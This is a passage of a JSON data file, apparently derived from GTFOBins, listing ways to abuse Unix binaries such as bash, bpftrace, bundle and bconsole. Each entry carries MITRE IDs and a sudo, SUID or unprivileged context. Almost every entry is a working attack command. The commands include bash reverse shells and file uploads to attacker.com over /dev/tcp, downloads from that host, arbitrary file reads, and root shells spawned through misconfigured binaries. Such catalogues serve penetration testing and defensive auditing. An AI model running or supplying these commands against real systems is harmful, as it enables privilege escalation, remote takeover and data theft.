>/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -p -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"bash -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -p -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"bash -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bash -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bash -p -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bash -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"bash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"bash -p -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"bash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:library-load:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"bash -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:library-load:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"bash -p -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:library-load:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"bash -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:reverse-shell:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:reverse-shell:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"bash -p -c 'exec bash -p -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:reverse-shell:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:shell:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:shell:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bash -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:shell:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"bash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -p -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -p -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"bash -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bashbug:inherit:0:sudo","toolId":"gtfo:bashbug","toolName":"bashbug","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"bashbug","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bashbug/"]},{"id":"gtfo:bashbug:inherit:0:unprivileged","toolId":"gtfo:bashbug","toolName":"bashbug","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"bashbug","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bashbug/"]},{"id":"gtfo:batcat:inherit:0:sudo","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/batcat/"]},{"id":"gtfo:batcat:inherit:0:suid","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/batcat/"]},{"id":"gtfo:batcat:inherit:0:unprivileged","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/batcat/"]},{"id":"gtfo:bbot:file-read:0:sudo","toolId":"gtfo:bbot","toolName":"bbot","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bbot -d -cy /path/to/input-file","description":"The file is displayed in the debug log.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bbot/"]},{"id":"gtfo:bbot:file-read:0:unprivileged","toolId":"gtfo:bbot","toolName":"bbot","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bbot -d -cy /path/to/input-file","description":"The file is displayed in the debug log.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bbot/"]},{"id":"gtfo:bc:file-read:0:sudo","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bc/"]},{"id":"gtfo:bc:file-read:0:suid","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bc/"]},{"id":"gtfo:bc:file-read:0:unprivileged","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bc/"]},{"id":"gtfo:bconsole:file-read:0:sudo","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:file-read:0:suid","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:file-read:0:unprivileged","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:shell:0:sudo","toolId":"gtfo:bconsole","toolName":"bconsole","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bconsole\n@exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:shell:0:unprivileged","toolId":"gtfo:bconsole","toolName":"bconsole","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"bconsole\n@exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bee:inherit:0:sudo","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bee/"]},{"id":"gtfo:bee:inherit:0:suid","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bee/"]},{"id":"gtfo:bee:inherit:0:unprivileged","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bee/"]},{"id":"gtfo:borg:shell:0:sudo","toolId":"gtfo:borg","toolName":"borg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"borg extract @:/::: --rsh \"/bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/borg/"]},{"id":"gtfo:borg:shell:0:unprivileged","toolId":"gtfo:borg","toolName":"borg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"borg extract @:/::: --rsh \"/bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/borg/"]},{"id":"gtfo:bpftrace:shell:0:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bpftrace --unsafe -e 'BEGIN {system(\"/bin/sh 1<&0\");exit()}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"]},{"id":"gtfo:bpftrace:shell:1:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'BEGIN {system(\"/bin/sh 1<&0\");exit()}' >/path/to/temp-file\nbpftrace --unsafe /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"]},{"id":"gtfo:bpftrace:shell:2:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bpftrace -c /bin/sh -e 'END {exit()}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"]},{"id":"gtfo:bridge:file-read:0:sudo","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bridge/"]},{"id":"gtfo:bridge:file-read:0:suid","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bridge/"]},{"id":"gtfo:bridge:file-read:0:unprivileged","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bridge/"]},{"id":"gtfo:bundle:inherit:0:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"bundle help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:inherit:0:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"bundle help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:inherit:1:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"touch Gemfile\nbundle console","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:inherit:1:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"touch Gemfile\nbundle console","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:0:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"BUNDLE_GEMFILE=x bundle exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:0:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"BUNDLE_GEMFILE=x bundle exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:1:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"touch Gemfile\nbundle exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:1:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"touch Gemfile\nbundle exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:2:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'system(\"/bin/sh\")' >Gemfile\nbundle install","description":"This might run the shell twice, one after the other.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:2:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'system(\"/bin/sh\")' >Gemfile\nbundle install","description":"This might run the shell twice, one after the other.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:busctl:inherit:0:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:inherit:0:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:inherit:0:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"busctl 